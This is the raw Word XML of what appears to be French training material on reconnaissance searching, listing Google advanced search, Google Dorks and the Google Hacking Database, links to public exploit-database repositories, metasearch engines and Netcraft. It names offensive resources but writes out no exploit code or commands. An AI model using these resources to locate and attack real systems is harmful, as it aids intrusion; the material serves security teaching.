    <w:p w14:paraId="2DA4810B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1AF74BD4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1C24CCC6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="6ECA284B" wp14:editId="5C78B663">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3052763</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>255175</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2886075" cy="400050"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="2" name="Zone de texte 2"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="1198450" y="717850"/>
                          <a:ext cx="2863200" cy="378300"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="A4C2F4"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1080EE52" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>Url:https://www.google.fr/advanced_search</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="6ECA284B" id="Zone de texte 2" o:spid="_x0000_s1037" type="#_x0000_t202" style="position:absolute;margin-left:240.4pt;margin-top:20.1pt;width:227.25pt;height:31.5pt;z-index:25167052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" fillcolor="#a4c2f4" stroked="f">
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w14:paraId="1080EE52" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>Url:https://www.google.fr/advanced_search</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD089B7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="3D401DC1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En utilisant le mode recherche avancée </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC23AA5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="3950BB5C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="69309614" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En utilisant Google </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dorks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et Google Hacking </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Database</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (GHDB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FA7F6B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FF6F2E8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FD16940" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploits &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Shellcodes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidR="00223B72">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/offensive-security/exploit-database</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0FBF9438" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploits Binaires : </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidR="00223B72">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/offensive-security/exploit-database-bin-sploits</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43A5E543" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Publications : </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidR="00223B72">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/offensive-security/exploit-database-papers</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5908AA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48AE4CFB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="1DF9D899" wp14:editId="14F716E3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>409575</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>167687</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2324100" cy="371475"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="16" name="Zone de texte 16"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="1781300" y="431525"/>
                          <a:ext cx="2300700" cy="347700"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="C9DAF8"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5E849691" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Url:https://www.exploit-db.com/</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1DF9D899" id="Zone de texte 16" o:spid="_x0000_s1038" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:32.25pt;margin-top:13.2pt;width:183pt;height:29.25pt;z-index:25167155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" fillcolor="#c9daf8" stroked="f">
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w14:paraId="5E849691" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Url:https://www.exploit-db.com/</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CC1040" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6C9843A2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a2"/>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223B72" w14:paraId="12181FF2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8309" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9EAD3"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="28679CA2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Titre3"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="34" w:name="_xh1iknma0ja6" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkEnd w:id="34"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Les Métamoteurs de recherche</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29F0B337" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="428E4E05" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6853FE1D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="6635C9DF" wp14:editId="388E4DD3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2314575</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>190500</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1766888" cy="445631"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="14" name="Zone de texte 14"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="155425" y="1239350"/>
                          <a:ext cx="1626000" cy="398700"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="C9DAF8"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1B2FA740" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>Url: https://metager.org</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="6635C9DF" id="Zone de texte 14" o:spid="_x0000_s1039" type="#_x0000_t202" style="position:absolute;margin-left:182.25pt;margin-top:15pt;width:139.15pt;height:35.1pt;z-index:25167257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" fillcolor="#c9daf8" stroked="f">
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w14:paraId="1B2FA740" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>Url: https://metager.org</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="464C5B03" wp14:editId="7A4C673D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4171950</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>204788</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1766888" cy="415738"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="19" name="Zone de texte 19"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="155425" y="1239350"/>
                          <a:ext cx="1758900" cy="398700"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="C9DAF8"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="60ECF280" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>Url: https://www.etools.ch</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="464C5B03" id="Zone de texte 19" o:spid="_x0000_s1040" type="#_x0000_t202" style="position:absolute;margin-left:328.5pt;margin-top:16.15pt;width:139.15pt;height:32.75pt;z-index:25167360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" fillcolor="#c9daf8" stroked="f">
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w14:paraId="60ECF280" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>Url: https://www.etools.ch</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="794898BD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6021979A" wp14:editId="03C1E64F">
                <wp:extent cx="2152650" cy="419100"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="18" name="Zone de texte 18"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="155425" y="1239350"/>
                          <a:ext cx="2137200" cy="398700"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="C9DAF8"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4ECBB7D4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>Url: https://www.startpage.com</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="6021979A" id="Zone de texte 18" o:spid="_x0000_s1041" type="#_x0000_t202" style="width:169.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" fillcolor="#c9daf8" stroked="f">
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w14:paraId="4ECBB7D4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>Url: https://www.startpage.com</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="711894AD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="570CA12A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1A8FACE4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="14E85822" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>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23B72" w14:paraId="7BE8D93D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9029" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9EAD3"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3089D7C2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Titre3"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="35" w:name="_la1oc8osee3b" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkEnd w:id="35"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Les moteurs de recherche des sites WEB</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33270B4A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2EE304AE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="40AD25BD" wp14:editId="4D8D909C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2571750</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>276225</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2514600" cy="352425"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="4" name="Zone de texte 4"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="1331375" y="861000"/>
                          <a:ext cx="2495100" cy="337500"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="C9DAF8"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="65DC4420" w14:textId="77777777" w:rsidR="00223B72" w:rsidRPr="00BD3814" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:jc w:val="center"/>
                              <w:textDirection w:val="btLr"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00BD3814">
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Url: https://www.netcraft.com/tools/</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="40AD25BD" id="Zone de texte 4" o:spid="_x0000_s1042" type="#_x0000_t202" style="position:absolute;margin-left:202.5pt;margin-top:21.75pt;width:198pt;height:27.75pt;z-index:25167462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" fillcolor="#c9daf8" stroked="f">
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w14:paraId="65DC4420" w14:textId="77777777" w:rsidR="00223B72" w:rsidRPr="00BD3814" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:jc w:val="center"/>
                        <w:textDirection w:val="btLr"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00BD3814">
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Url: https://www.netcraft.com/tools/</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="56374314" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="21153521" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>En utilisant NETCRAFT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A3E4D1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
